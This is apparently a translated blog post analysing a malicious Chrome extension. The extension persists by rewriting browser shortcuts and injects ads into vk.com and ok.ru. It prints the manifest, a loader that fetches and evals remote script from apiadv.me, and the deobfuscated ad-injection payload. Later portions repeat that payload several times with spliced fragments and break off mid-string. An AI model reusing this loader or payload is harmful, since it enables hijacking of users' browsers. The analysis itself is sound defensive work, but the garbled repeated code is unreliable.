Analysis of malicious chrome extension
Good afternoon, today I will tell you about a single malware caught on the Internet. This malware pretends to be Google Chrome browser extension. When infecting, it modifies the shortcut by appending the extension load command (--load-extension “path to the malware”). That is, you can remove the extension in the browser, but the next time you start it, it will be installed again.
Let's look under the hood of the extension:
All source code extensions are available at github link.
From the manifest file, it is clear that the bg.js entry point, bgvk.js and bgvk.css files are connected to vk.com. By analogy, bgok.js and bgok.css files are connected to the odnoklassniki.ru website. All script files are obfuscated.
')
The script stretches in 3 places:
From the first link we get a json file with the following content:
Next, the malware draws a script for this urla: h ** p: //apiadv.me/js/vkapi.js. then its hash is compared (to get the file hash, the hash.js script is needed) with the hashv value from json(correct, and then all your enemies will compromise!) . Next, the resulting script is saved in chrome.storage.local under the value bxGZABwi.
Similarly, the script h ** p: //apiadv.me/js/okapi.js - it is saved under the value tQFzTAwV. Further analysis will be only for the site vk.com, for the site ok.ru there is a similar scenario.
There is an attempt to load data from chrome.storage.local and add it to the head element of the page. If there is no data, the script tries to retrieve it from the network using the same link.
So what are you trying so hard to download to us?
When you go to the url we get obfuscated file Using jsbeautifier.org we bring it to a quite readable form:
The script deletes the advertisement that vk.com renders, after which 2 Iframe elements are created. An advertisement with url =: "// axisworlds.me/advpages/vadvaaa/vadvmgh.html" is drawn in one of the iframe,
then Iframe with ads is placed on the site of the “legitimate” advertising site vk.com.
Maybe it's just my prejudices, but still. At the moment, the extension simply redraws advertising in two social networks, but at the same time, re-qualifying it as something more serious, changing the sources on the server will not be the owner.
Thanks for attention!
Let's look under the hood of the extension:
Expansion structure
Manifest.json
Bg.js
bgok.js
hash.js
bgvk.js
123.png
Folders _locales and CSS
Bg.js
bgok.js
hash.js
bgvk.js
123.png
Folders _locales and CSS
All source code extensions are available at github link.
Manifest.json
{ "manifest_version": 2, "name": "Go fire", "permissions": [ "<all_urls>", "*://*/*", "unlimitedStorage", "storage", "tabs", "activeTab" ], "version": "3.8", "background": { "persistent": true, "scripts": [ "hash.js", "bg.js" ] }, "content_scripts": [ { "css": [ "css/bgvk.css" ], "js": [ "bgvk.js" ], "matches": [ "*://vk.com/*", "*://*.vk.com/*" ] }, { "css": [ "css/bgok.css" ], "js": [ "bgok.js" ], "matches": [ "*://odnoklassniki.ru/*", "*://www.odnoklassniki.ru/*", "*://ok.ru/*", "*://*.ok.ru/*" ] } ], "default_locale": "ru", "description": "__MSG_appDesc__", "icons": { "128": "128.png" } } From the manifest file, it is clear that the bg.js entry point, bgvk.js and bgvk.css files are connected to vk.com. By analogy, bgok.js and bgok.css files are connected to the odnoklassniki.ru website. All script files are obfuscated.
')
Description bg.js
The script stretches in 3 places:
h ** p: //apiadv.me/hashes/apis.json
h ** p: //apiadv.me/js/vkapi.js
h ** p: //apiadv.me/js/okapi.js
From the first link we get a json file with the following content:
[{"hashv":"13961f856524885207d8613a375ac2a9","hasho":"661f0a082c3153025f315eed43632dad"}] Next, the malware draws a script for this urla: h ** p: //apiadv.me/js/vkapi.js. then its hash is compared (to get the file hash, the hash.js script is needed) with the hashv value from json
Similarly, the script h ** p: //apiadv.me/js/okapi.js - it is saved under the value tQFzTAwV. Further analysis will be only for the site vk.com, for the site ok.ru there is a similar scenario.
Let's take a closer look at bgvk.js
bgvk.js
var IlTPXFOys = 'IlTPXFOysLy9hcGlhZHYubWUvanMvdmthcGkuanM=IlTPXFOya'; // "http://apiadv.me/js/vkapi.js" var j = '//ajax.googleapis.com/ajax/libs/jquery/1.12.3/jquery.min.js'; var s = document.createElement('script'); s.type = 'text/javascript'; s.src = j; document.head.appendChild(s); function LnDgSyNS() { var b = new XMLHttpRequest(); b.open('GET', j, true); b.onreadystatechange = function () { if (b.readyState == 4 && b.status === 200) { eval(b.responseText); } ; }; b.send(); var t = 0; function g() { if (window.jQuery) { jQuery.getScript(atob(IlTPXFOys.slice(9, -9)) + '?' + Math.floor((Math.random() * 1e+10) + 1)); } else { t++; if (t < 100) { setTimeout(g, 100); } ; } ; }; g(); }; chrome.storage.local.get({bxGZABwi: ''}, function (syncdata) { if (!chrome.runtime.lastError) { if (syncdata.bxGZABwi != '') { var i = document.createElement('script'); i.type = 'text/javascript'; i.innerHTML = syncdata.bxGZABwi; document.head.appendChild(i); } else { LnDgSyNS(); } ; } else { LnDgSyNS(); } ; }); There is an attempt to load data from chrome.storage.local and add it to the head element of the page. If there is no data, the script tries to retrieve it from the network using the same link.
So what are you trying so hard to download to us?
Consider the file vkapi.js
When you go to the url we get obfuscated file Using jsbeautifier.org we bring it to a quite readable form:
vkapi.js
if (document['getElementById']('ads_left') != null) { document['getElementById']('ads_left')['innerHTML'] = '' }; if (document['getElementById']('left_ads') != null) { document['getElementById']('left_ads')['innerHTML'] = '' }; var vkui = 1; if (document['getElementById']('side_bar_inner') == null) { vkui = 2 }; function A() { var _0xb14bx3 = ''; var _0xb14bx4 = 'abcdefghijklmnopqrstuvwxyz_'; for (var _0xb14bx5 = 0; _0xb14bx5 < 32; _0xb14bx5++) { _0xb14bx3 += _0xb14bx4['charAt'](Math['floor'](Math['random']() * _0xb14bx4['length'])) }; return _0xb14bx3 } var asrcfrmn = A(); function SETSRCFRM(_0xb14bx8) { var _0xb14bx9; if (_0xb14bx8 == 1) { _0xb14bx9 = 'side_bar_inner' } else { _0xb14bx9 = 'side_bar' }; if (document['getElementById'](_0xb14bx9) != null && document['getElementById'](asrcfrmn) == null && document['getElementById'](asrcfrmn + '_a') == null && document['getElementById']('quick_login') == null) { var _0xb14bxa = document['createElement']('div'); _0xb14bxa['setAttribute']('id', asrcfrmn); _0xb14bxa['setAttribute']('style', 'position:relative;'); if (_0xb14bx8 == 1) { $('#' + _0xb14bx9 + ' ol')['after'](_0xb14bxa) } else { $('#' + _0xb14bx9)['append'](_0xb14bxa) }; var _0xb14bxb = 'display:none;padding:0px;padding-top:0px;border:none;width:130px;height:1080px;overflow:hidden;z-index:100;position:static;'; var _0xb14bxc = document['createElement']('iframe'); _0xb14bxc['setAttribute']('style', _0xb14bxb); _0xb14bxc['setAttribute']('id', asrcfrmn + '_a'); _0xb14bxc['setAttribute']('marginwidth', '0'); _0xb14bxc['setAttribute']('marginheight', '0'); _0xb14bxc['setAttribute']('scrolling', 'no'); _0xb14bxc['setAttribute']('frameborder', '0'); $('#' + asrcfrmn)['append'](_0xb14bxc); var _0xb14bxd = document['createElement']('iframe'); _0xb14bxd['setAttribute']('style', _0xb14bxb); _0xb14bxd['setAttribute']('id', asrcfrmn + '_b'); _0xb14bxd['setAttribute']('marginwidth', '0'); _0xb14bxd['setAttribute']('marginheight', '0'); _0xb14bxd['setAttribute']('scrolling', 'no'); _0xb14bxd['setAttribute']('frameborder', '0'); $('#' + asrcfrmn)['append'](_0xb14bxd) }; function _0xb14bxe() { var _0xb14bxe = ['aRMLy9heGlzd29ybGQuY28vYWR2cGFnZXMvdmFkdmFhYS92YWR2bWdoLmh0bWw=', 'aRMLy9heGlzd29ybGQuY28vYWR2cGFnZXMvdmFkdmFhYS92YWR2cmNrdGFoLmh0bWw=', 'aRMLy9heGlzd29ybGQuY28vYWR2cGFnZXMvdmFkdmFhYS92YWR2bWdoLmh0bWw=', 'aRMLy9heGlzd29ybGQuY28vYWR2cGFnZXMvdmFkdmFhYS92YWR2cmNrdGFoLmh0bWw=', 'aRMLy9heGlzd29ybGQuY28vYWR2cGFnZXMvdmFkdmFhYS92YWR2bWdoLmh0bWw=', 'aRMLy9heGlzd29ybGQuY28vYWR2cGFnZXMvdmFkdmFhYS92YWR2cmNrdGFoLmh0bWw=', 'aRMLy9heGlzd29ybGQuY28vYWR2cGFnZXMvdmFkdmFhYS92YWR2bWdoYS5odG1s', 'aRMLy9heGlzd29ybGQuY28vYWR2cGFnZXMvdmFkdmFhYS92YWR2cmNrdGFoLmh0bWw=', 'aRMLy9heGlzd29ybGQuY28vYWR2cGFnZXMvdmFkdmFhYS92YWR2bWdoYS5odG1s', 'aRMLy9heGlzd29ybGQuY28vYWR2cGFnZXMvdmFkdmFhYS92YWR2bWdoYS5odG1s', 'aRMLy9heGlzd29ybGRzLm1lL2FkdnBhZ2VzL3ZhZHZhYWEvdmFkdm1naC5odG1s', 'aRMLy9heGlzd29ybGRzLm1lL2FkdnBhZ2VzL3ZhZHZhYWEvdmFkdnJja3RhaC5odG1s', 'aRMLy9heGlzd29ybGRzLm1lL2FkdnBhZ2VzL3ZhZHZhYWEvdmFkdm1naC5odG1s', 'aRMLy9heGlzd29ybGRzLm1lL2FkdnBhZ2VzL3ZhZHZhYWEvdmFkdnJja3RhaC5odG1s', 'aRMLy9heGlzd29ybGRzLm1lL2FkdnBhZ2VzL3ZhZHZhYWEvdmFkdm1naC5odG1s', 'aRMLy9heGlzd29ybGRzLm1lL2FkdnBhZ2VzL3ZhZHZhYWEvdmFkdnJja3RhaC5odG1s', 'aRMLy9heGlzd29ybGRzLm1lL2FkdnBhZ2VzL3ZhZHZhYWEvdmFkdm1naGEuaHRtbA==', 'aRMLy9heGlzd29ybGRzLm1lL2FkdnBhZ2VzL3ZhZHZhYWEvdmFkdnJja3RhaC5odG1s', 'aRMLy9heGlzd29ybGRzLm1lL2FkdnBhZ2VzL3ZhZHZhYWEvdmFkdm1naGEuaHRtbA==', 'aRMLy9heGlzd29ybGRzLm1lL2FkdnBhZ2VzL3ZhZHZhYWEvdmFkdm1naGEuaHRtbA==', 'aRMLy9zZWFyY2hwbHVzLm1lL3ZhZHZhL3ZhZHZyY2EuaHRtbA==']; return _0xb14bxe[Math['floor'](Math['random']() * _0xb14bxe['length'])]['substr'](3) } function _0xb14bxf(_0xb14bx10, _0xb14bx11, _0xb14bx12, _0xb14bx13, _0xb14bx14, _0xb14bx15) { if (_0xb14bx13 == 0 && _0xb14bx14 == 0) { $(_0xb14bx10)['animate']({ opacity: _0xb14bx12 }, _0xb14bx11, function () { if (_0xb14bx15 == 1) { $(_0xb14bx10)['removeAttr']('src') } }) }; if (_0xb14bx13 != 0 && _0xb14bx14 == 0) { $(_0xb14bx10)['animate']({ opacity: _0xb14bx12 }, _0xb14bx11, function () { $(_0xb14bx10)['css']({ "display": _0xb14bx13 }); if (_0xb14bx15 == 1) { $(_0xb14bx10)['removeAttr']('src') } }) }; if (_0xb14bx13 == 0 && _0xb14bx14 != 0) { $(_0xb14bx10)['animate']({ opacity: _0xb14bx12 }, _0xb14bx11, function () { $(_0xb14bx10)['css']({ "position": _0xb14bx14 }); if (_0xb14bx15 == 1) { $(_0xb14bx10)['removeAttr']('src') } }) }; if (_0xb14bx13 != 0 && _0xb14bx14 != 0) { $(_0xb14bx10)['animate']({ opacity: _0xb14bx12 }, _0xb14bx11, function () { $(_0xb14bx10)['css']({ "display": _0xb14bx13 , "position": _0xb14bx14 }); if (_0xb14bx15 == 1) { $(_0xb14bx10)['removeAttr']('src') } }) } } var _0xb14bx16 = document['getElementById'](asrcfrmn + '_a'); var _0xb14bx17 = document['getElementById'](asrcfrmn + '_b'); if (_0xb14bx16['style']['display'] == 'none') { _0xb14bx16['setAttribute']('src', atob(_0xb14bxe())); function _0xb14bx18() { document['getElementById'](asrcfrmn + '_a')['onload'] = null; if (_0xb14bx16['getAttribute']('src') != null) { $('#' + asrcfrmn + '_b')['css']({ "z-index": '100' , "position": 'static' }); $('#' + asrcfrmn + '_a')['css']({ "z-index": '101' , "position": 'absolute' , "opacity": 0 , "display": 'block' , "top": 0 , "left": 0 }); _0xb14bxf('#' + asrcfrmn + '_a', 200, 1, 0, 'static', 0); _0xb14bxf('#' + asrcfrmn + '_b', 200, 0, 'none', 0, 1) } } document['getElementById'](asrcfrmn + '_a')['onload'] = _0xb14bx18 } else { _0xb14bx17['setAttribute']('src', atob(_0xb14bxe())); function _0xb14bx19() { document['getElementById'](asrcfrmn + '_b')['onload'] = null; if (_0xb14bx17['getAttribute']('src') != null) { $('#' + asrcfrmn + '_a')['css']({ "z-index": '100' , "position": 'static' }); $('#' + asrcfrmn + '_b')['css']({ "z-index": '101' , "position": 'absolute' , "opacity": 0 , "display": 'block' , "top": 0 , "left": 0 }); _0xb14bxf('#' + asrcfrmn + '_b', 200, 1, 0, 'static', 0); _0xb14bxf('#' + asrcfrmn + '_a', 200, 0, 'none', 0, 1) } } document['getElementById'](asrcfrmn + '_b')['onload'] = _0xb14bx19 } } var winact; var eventct = 1; function RI() { IRF = setInterval(function () { if (winact == 'active') { SETSRCFRM() } }, 120000) } function FR() { setTimeout(function () { eventct = 0 }, 3500) } function CL() { if (eventct == 0) { eventct = 1; SETSRCFRM(); clearInterval(IRF); RI(); FR() } } function RLA() { $('#left_ads, #ads_left')['remove'](); setTimeout(RLA, 30000) } function MAINSTART() { SETSRCFRM(vkui); FR(); RI(); RLA(); var _0xb14bx21 = $('#side_bar_inner ol')['height']() - 8; if (_0xb14bx21 > 6) { $('#side_bar_inner')['css']('height', _0xb14bx21) }; $('a, a span')['click'](function () { CL() }); $(document)['on']('click', 'a div, div a, button, a > b', function () { CL() }); setTimeout(function () { $('#left_blocks, .left_holiday')['animate']({ "opacity": '0' }, 300, function () { $('#left_blocks, .left_holiday')['hide']() }) }, 10000); var _0xb14bx22; $(document)['mousemove'](function () { if (winact != 'active') { winact = 'active' }; clearTimeout(_0xb14bx22); _0xb14bx22 = setTimeout(function () { winact = 'inactive' }, 120000) }); $(document)['hover'](function (_0xb14bx23) { if (_0xb14bx23['fromElement']) { winact = 'inactive'; clearTimeout(_0xb14bx22) } else { winact = 'active' } }) } var trystart = 0; function START() { trystart += 1; if (window['jQuery']) { MAINSTART() } else { if (trystart > 35) { var _0xb14bx26 = document['createElement']('script'); _0xb14bx26['type'] = 'text/javascript'; _0xb14bx26['src'] = '//code.jquery.com/jquery-1.12.3.min.js'; document['head']['appendChild'](_0xb14bx26) }; if (trystart < 500) { setTimeout(START, 75) } } } START(); var st = document['createElement']('style'); st['innerHTML'] = '#left_ads,#left_ads > *,#ads_left,#ads_left > * > *,div[id*="ayments_bo"],div[class*="anding_moneysen"],div[id*="ds_page_simpl"] div[class*="ds_intro_pag"],div[id*="ickets_conten"] div[id*="ew_ticke"],div[id="ads_page_wrap3"],div[class*="log_about_pres"] div[class*="log_about_wra"]{display:none!important;opacity:0!important;height:0px!important;min-height:0px!important;}'; document['head']['appendChild'](st) , 'aRMLy9heGlzd29ybGQuY28vYWR2cGFnZXMvdmFkdmFhYS92YWR2cmNrdGFoLmh0bWw =', 'aRMLy9heGlzd29ybGQuY28vYWR2cGFnZXMvdmFkdmFhYS92YWR2bWdoLmh0bWw =', 'aRMLy9heGlzd29ybGQuY28vYWR2cGFnZXMvdmFkdmFhYS92YWR2cmNrdGFoLmh0bWw =', 'aRMLy9heGlzd29ybGQuY28vYWR2cGFnZXMvdmFkdmFhYS92YWR2bWdoLmh0bWw =', 'aRMLy9heGlzd29ybGQuY28vYWR2cGFnZXMvdmFkdmFhYS92YWR2cmNrdGFoLmh0bWw =', 'aRMLy9heGlzd29ybGQuY28vYWR2cGFnZXMvdmFkdmFhYS92YWR2bWdoYS5odG1s', 'aRMLy9heGlzd29ybGQuY28vYWR2cGFnZXMvdmFkdmFhYS92YWR2cmNrdGFoLmh0bWw =', 'aRMLy9heGlzd29ybGQuY28vYWR2cGFnZXMvdmFkdmFhYS92YWR2bWdoYS5odG1s', 'aRMLy9heGlzd29ybGQuY28vYWR2cGFnZXMvdmFkdmFhYS92YWR2bWdoYS5odG1s' if (document['getElementById']('ads_left') != null) { document['getElementById']('ads_left')['innerHTML'] = '' }; if (document['getElementById']('left_ads') != null) { document['getElementById']('left_ads')['innerHTML'] = '' }; var vkui = 1; if (document['getElementById']('side_bar_inner') == null) { vkui = 2 }; function A() { var _0xb14bx3 = ''; var _0xb14bx4 = 'abcdefghijklmnopqrstuvwxyz_'; for (var _0xb14bx5 = 0; _0xb14bx5 < 32; _0xb14bx5++) { _0xb14bx3 += _0xb14bx4['charAt'](Math['floor'](Math['random']() * _0xb14bx4['length'])) }; return _0xb14bx3 } var asrcfrmn = A(); function SETSRCFRM(_0xb14bx8) { var _0xb14bx9; if (_0xb14bx8 == 1) { _0xb14bx9 = 'side_bar_inner' } else { _0xb14bx9 = 'side_bar' }; if (document['getElementById'](_0xb14bx9) != null && document['getElementById'](asrcfrmn) == null && document['getElementById'](asrcfrmn + '_a') == null && document['getElementById']('quick_login') == null) { var _0xb14bxa = document['createElement']('div'); _0xb14bxa['setAttribute']('id', asrcfrmn); _0xb14bxa['setAttribute']('style', 'position:relative;'); if (_0xb14bx8 == 1) { $('#' + _0xb14bx9 + ' ol')['after'](_0xb14bxa) } else { $('#' + _0xb14bx9)['append'](_0xb14bxa) }; var _0xb14bxb = 'display:none;padding:0px;padding-top:0px;border:none;width:130px;height:1080px;overflow:hidden;z-index:100;position:static;'; var _0xb14bxc = document['createElement']('iframe'); _0xb14bxc['setAttribute']('style', _0xb14bxb); _0xb14bxc['setAttribute']('id', asrcfrmn + '_a'); _0xb14bxc['setAttribute']('marginwidth', '0'); _0xb14bxc['setAttribute']('marginheight', '0'); _0xb14bxc['setAttribute']('scrolling', 'no'); _0xb14bxc['setAttribute']('frameborder', '0'); $('#' + asrcfrmn)['append'](_0xb14bxc); var _0xb14bxd = document['createElement']('iframe'); _0xb14bxd['setAttribute']('style', _0xb14bxb); _0xb14bxd['setAttribute']('id', asrcfrmn + '_b'); _0xb14bxd['setAttribute']('marginwidth', '0'); _0xb14bxd['setAttribute']('marginheight', '0'); _0xb14bxd['setAttribute']('scrolling', 'no'); _0xb14bxd['setAttribute']('frameborder', '0'); $('#' + asrcfrmn)['append'](_0xb14bxd) }; function _0xb14bxe() { var _0xb14bxe = ['aRMLy9heGlzd29ybGQuY28vYWR2cGFnZXMvdmFkdmFhYS92YWR2bWdoLmh0bWw=', 'aRMLy9heGlzd29ybGQuY28vYWR2cGFnZXMvdmFkdmFhYS92YWR2cmNrdGFoLmh0bWw=', 'aRMLy9heGlzd29ybGQuY28vYWR2cGFnZXMvdmFkdmFhYS92YWR2bWdoLmh0bWw=', 'aRMLy9heGlzd29ybGQuY28vYWR2cGFnZXMvdmFkdmFhYS92YWR2cmNrdGFoLmh0bWw=', 'aRMLy9heGlzd29ybGQuY28vYWR2cGFnZXMvdmFkdmFhYS92YWR2bWdoLmh0bWw=', 'aRMLy9heGlzd29ybGQuY28vYWR2cGFnZXMvdmFkdmFhYS92YWR2cmNrdGFoLmh0bWw=', 'aRMLy9heGlzd29ybGQuY28vYWR2cGFnZXMvdmFkdmFhYS92YWR2bWdoYS5odG1s', 'aRMLy9heGlzd29ybGQuY28vYWR2cGFnZXMvdmFkdmFhYS92YWR2cmNrdGFoLmh0bWw=', 'aRMLy9heGlzd29ybGQuY28vYWR2cGFnZXMvdmFkdmFhYS92YWR2bWdoYS5odG1s', 'aRMLy9heGlzd29ybGQuY28vYWR2cGFnZXMvdmFkdmFhYS92YWR2bWdoYS5odG1s', 'aRMLy9heGlzd29ybGRzLm1lL2FkdnBhZ2VzL3ZhZHZhYWEvdmFkdm1naC5odG1s', 'aRMLy9heGlzd29ybGRzLm1lL2FkdnBhZ2VzL3ZhZHZhYWEvdmFkdnJja3RhaC5odG1s', 'aRMLy9heGlzd29ybGRzLm1lL2FkdnBhZ2VzL3ZhZHZhYWEvdmFkdm1naC5odG1s', 'aRMLy9heGlzd29ybGRzLm1lL2FkdnBhZ2VzL3ZhZHZhYWEvdmFkdnJja3RhaC5odG1s', 'aRMLy9heGlzd29ybGRzLm1lL2FkdnBhZ2VzL3ZhZHZhYWEvdmFkdm1naC5odG1s', 'aRMLy9heGlzd29ybGRzLm1lL2FkdnBhZ2VzL3ZhZHZhYWEvdmFkdnJja3RhaC5odG1s', 'aRMLy9heGlzd29ybGRzLm1lL2FkdnBhZ2VzL3ZhZHZhYWEvdmFkdm1naGEuaHRtbA==', 'aRMLy9heGlzd29ybGRzLm1lL2FkdnBhZ2VzL3ZhZHZhYWEvdmFkdnJja3RhaC5odG1s', 'aRMLy9heGlzd29ybGRzLm1lL2FkdnBhZ2VzL3ZhZHZhYWEvdmFkdm1naGEuaHRtbA==', 'aRMLy9heGlzd29ybGRzLm1lL2FkdnBhZ2VzL3ZhZHZhYWEvdmFkdm1naGEuaHRtbA==', 'aRMLy9zZWFyY2hwbHVzLm1lL3ZhZHZhL3ZhZHZyY2EuaHRtbA==']; return _0xb14bxe[Math['floor'](Math['random']() * _0xb14bxe['length'])]['substr'](3) } function _0xb14bxf(_0xb14bx10, _0xb14bx11, _0xb14bx12, _0xb14bx13, _0xb14bx14, _0xb14bx15) { if (_0xb14bx13 == 0 && _0xb14bx14 == 0) { $(_0xb14bx10)['animate']({ opacity: _0xb14bx12 }, _0xb14bx11, function () { if (_0xb14bx15 == 1) { $(_0xb14bx10)['removeAttr']('src') } }) }; if (_0xb14bx13 != 0 && _0xb14bx14 == 0) { $(_0xb14bx10)['animate']({ opacity: _0xb14bx12 }, _0xb14bx11, function () { $(_0xb14bx10)['css']({ "display": _0xb14bx13 }); if (_0xb14bx15 == 1) { $(_0xb14bx10)['removeAttr']('src') } }) }; if (_0xb14bx13 == 0 && _0xb14bx14 != 0) { $(_0xb14bx10)['animate']({ opacity: _0xb14bx12 }, _0xb14bx11, function () { $(_0xb14bx10)['css']({ "position": _0xb14bx14 }); if (_0xb14bx15 == 1) { $(_0xb14bx10)['removeAttr']('src') } }) }; if (_0xb14bx13 != 0 && _0xb14bx14 != 0) { $(_0xb14bx10)['animate']({ opacity: _0xb14bx12 }, _0xb14bx11, function () { $(_0xb14bx10)['css']({ "display": _0xb14bx13 , "position": _0xb14bx14 }); if (_0xb14bx15 == 1) { $(_0xb14bx10)['removeAttr']('src') } }) } } var _0xb14bx16 = document['getElementById'](asrcfrmn + '_a'); var _0xb14bx17 = document['getElementById'](asrcfrmn + '_b'); if (_0xb14bx16['style']['display'] == 'none') { _0xb14bx16['setAttribute']('src', atob(_0xb14bxe())); function _0xb14bx18() { document['getElementById'](asrcfrmn + '_a')['onload'] = null; if (_0xb14bx16['getAttribute']('src') != null) { $('#' + asrcfrmn + '_b')['css']({ "z-index": '100' , "position": 'static' }); $('#' + asrcfrmn + '_a')['css']({ "z-index": '101' , "position": 'absolute' , "opacity": 0 , "display": 'block' , "top": 0 , "left": 0 }); _0xb14bxf('#' + asrcfrmn + '_a', 200, 1, 0, 'static', 0); _0xb14bxf('#' + asrcfrmn + '_b', 200, 0, 'none', 0, 1) } } document['getElementById'](asrcfrmn + '_a')['onload'] = _0xb14bx18 } else { _0xb14bx17['setAttribute']('src', atob(_0xb14bxe())); function _0xb14bx19() { document['getElementById'](asrcfrmn + '_b')['onload'] = null; if (_0xb14bx17['getAttribute']('src') != null) { $('#' + asrcfrmn + '_a')['css']({ "z-index": '100' , "position": 'static' }); $('#' + asrcfrmn + '_b')['css']({ "z-index": '101' , "position": 'absolute' , "opacity": 0 , "display": 'block' , "top": 0 , "left": 0 }); _0xb14bxf('#' + asrcfrmn + '_b', 200, 1, 0, 'static', 0); _0xb14bxf('#' + asrcfrmn + '_a', 200, 0, 'none', 0, 1) } } document['getElementById'](asrcfrmn + '_b')['onload'] = _0xb14bx19 } } var winact; var eventct = 1; function RI() { IRF = setInterval(function () { if (winact == 'active') { SETSRCFRM() } }, 120000) } function FR() { setTimeout(function () { eventct = 0 }, 3500) } function CL() { if (eventct == 0) { eventct = 1; SETSRCFRM(); clearInterval(IRF); RI(); FR() } } function RLA() { $('#left_ads, #ads_left')['remove'](); setTimeout(RLA, 30000) } function MAINSTART() { SETSRCFRM(vkui); FR(); RI(); RLA(); var _0xb14bx21 = $('#side_bar_inner ol')['height']() - 8; if (_0xb14bx21 > 6) { $('#side_bar_inner')['css']('height', _0xb14bx21) }; $('a, a span')['click'](function () { CL() }); $(document)['on']('click', 'a div, div a, button, a > b', function () { CL() }); setTimeout(function () { $('#left_blocks, .left_holiday')['animate']({ "opacity": '0' }, 300, function () { $('#left_blocks, .left_holiday')['hide']() }) }, 10000); var _0xb14bx22; $(document)['mousemove'](function () { if (winact != 'active') { winact = 'active' }; clearTimeout(_0xb14bx22); _0xb14bx22 = setTimeout(function () { winact = 'inactive' }, 120000) }); $(document)['hover'](function (_0xb14bx23) { if (_0xb14bx23['fromElement']) { winact = 'inactive'; clearTimeout(_0xb14bx22) } else { winact = 'active' } }) } var trystart = 0; function START() { trystart += 1; if (window['jQuery']) { MAINSTART() } else { if (trystart > 35) { var _0xb14bx26 = document['createElement']('script'); _0xb14bx26['type'] = 'text/javascript'; _0xb14bx26['src'] = '//code.jquery.com/jquery-1.12.3.min.js'; document['head']['appendChild'](_0xb14bx26) }; if (trystart < 500) { setTimeout(START, 75) } } } START(); var st = document['createElement']('style'); st['innerHTML'] = '#left_ads,#left_ads > *,#ads_left,#ads_left > * > *,div[id*="ayments_bo"],div[class*="anding_moneysen"],div[id*="ds_page_simpl"] div[class*="ds_intro_pag"],div[id*="ickets_conten"] div[id*="ew_ticke"],div[id="ads_page_wrap3"],div[class*="log_about_pres"] div[class*="log_about_wra"]{display:none!important;opacity:0!important;height:0px!important;min-height:0px!important;}'; document['head']['appendChild'](st) , 'aRMLy9heGlzd29ybGRzLm1lL2FkdnBhZ2VzL3ZhZHZhYWEvdmFkdm1naC5odG1s',' aRMLy9heGlzd29ybGRzLm1lL2FkdnBhZ2VzL3ZhZHZhYWEvdmFkdnJja3RhaC5odG1s', 'aRMLy9heGlzd29ybGRzL if (document['getElementById']('ads_left') != null) { document['getElementById']('ads_left')['innerHTML'] = '' }; if (document['getElementById']('left_ads') != null) { document['getElementById']('left_ads')['innerHTML'] = '' }; var vkui = 1; if (document['getElementById']('side_bar_inner') == null) { vkui = 2 }; function A() { var _0xb14bx3 = ''; var _0xb14bx4 = 'abcdefghijklmnopqrstuvwxyz_'; for (var _0xb14bx5 = 0; _0xb14bx5 < 32; _0xb14bx5++) { _0xb14bx3 += _0xb14bx4['charAt'](Math['floor'](Math['random']() * _0xb14bx4['length'])) }; return _0xb14bx3 } var asrcfrmn = A(); function SETSRCFRM(_0xb14bx8) { var _0xb14bx9; if (_0xb14bx8 == 1) { _0xb14bx9 = 'side_bar_inner' } else { _0xb14bx9 = 'side_bar' }; if (document['getElementById'](_0xb14bx9) != null && document['getElementById'](asrcfrmn) == null && document['getElementById'](asrcfrmn + '_a') == null && document['getElementById']('quick_login') == null) { var _0xb14bxa = document['createElement']('div'); _0xb14bxa['setAttribute']('id', asrcfrmn); _0xb14bxa['setAttribute']('style', 'position:relative;'); if (_0xb14bx8 == 1) { $('#' + _0xb14bx9 + ' ol')['after'](_0xb14bxa) } else { $('#' + _0xb14bx9)['append'](_0xb14bxa) }; var _0xb14bxb = 'display:none;padding:0px;padding-top:0px;border:none;width:130px;height:1080px;overflow:hidden;z-index:100;position:static;'; var _0xb14bxc = document['createElement']('iframe'); _0xb14bxc['setAttribute']('style', _0xb14bxb); _0xb14bxc['setAttribute']('id', asrcfrmn + '_a'); _0xb14bxc['setAttribute']('marginwidth', '0'); _0xb14bxc['setAttribute']('marginheight', '0'); _0xb14bxc['setAttribute']('scrolling', 'no'); _0xb14bxc['setAttribute']('frameborder', '0'); $('#' + asrcfrmn)['append'](_0xb14bxc); var _0xb14bxd = document['createElement']('iframe'); _0xb14bxd['setAttribute']('style', _0xb14bxb); _0xb14bxd['setAttribute']('id', asrcfrmn + '_b'); _0xb14bxd['setAttribute']('marginwidth', '0'); _0xb14bxd['setAttribute']('marginheight', '0'); _0xb14bxd['setAttribute']('scrolling', 'no'); _0xb14bxd['setAttribute']('frameborder', '0'); $('#' + asrcfrmn)['append'](_0xb14bxd) }; function _0xb14bxe() { var _0xb14bxe = ['aRMLy9heGlzd29ybGQuY28vYWR2cGFnZXMvdmFkdmFhYS92YWR2bWdoLmh0bWw=', 'aRMLy9heGlzd29ybGQuY28vYWR2cGFnZXMvdmFkdmFhYS92YWR2cmNrdGFoLmh0bWw=', 'aRMLy9heGlzd29ybGQuY28vYWR2cGFnZXMvdmFkdmFhYS92YWR2bWdoLmh0bWw=', 'aRMLy9heGlzd29ybGQuY28vYWR2cGFnZXMvdmFkdmFhYS92YWR2cmNrdGFoLmh0bWw=', 'aRMLy9heGlzd29ybGQuY28vYWR2cGFnZXMvdmFkdmFhYS92YWR2bWdoLmh0bWw=', 'aRMLy9heGlzd29ybGQuY28vYWR2cGFnZXMvdmFkdmFhYS92YWR2cmNrdGFoLmh0bWw=', 'aRMLy9heGlzd29ybGQuY28vYWR2cGFnZXMvdmFkdmFhYS92YWR2bWdoYS5odG1s', 'aRMLy9heGlzd29ybGQuY28vYWR2cGFnZXMvdmFkdmFhYS92YWR2cmNrdGFoLmh0bWw=', 'aRMLy9heGlzd29ybGQuY28vYWR2cGFnZXMvdmFkdmFhYS92YWR2bWdoYS5odG1s', 'aRMLy9heGlzd29ybGQuY28vYWR2cGFnZXMvdmFkdmFhYS92YWR2bWdoYS5odG1s', 'aRMLy9heGlzd29ybGRzLm1lL2FkdnBhZ2VzL3ZhZHZhYWEvdmFkdm1naC5odG1s', 'aRMLy9heGlzd29ybGRzLm1lL2FkdnBhZ2VzL3ZhZHZhYWEvdmFkdnJja3RhaC5odG1s', 'aRMLy9heGlzd29ybGRzLm1lL2FkdnBhZ2VzL3ZhZHZhYWEvdmFkdm1naC5odG1s', 'aRMLy9heGlzd29ybGRzLm1lL2FkdnBhZ2VzL3ZhZHZhYWEvdmFkdnJja3RhaC5odG1s', 'aRMLy9heGlzd29ybGRzLm1lL2FkdnBhZ2VzL3ZhZHZhYWEvdmFkdm1naC5odG1s', 'aRMLy9heGlzd29ybGRzLm1lL2FkdnBhZ2VzL3ZhZHZhYWEvdmFkdnJja3RhaC5odG1s', 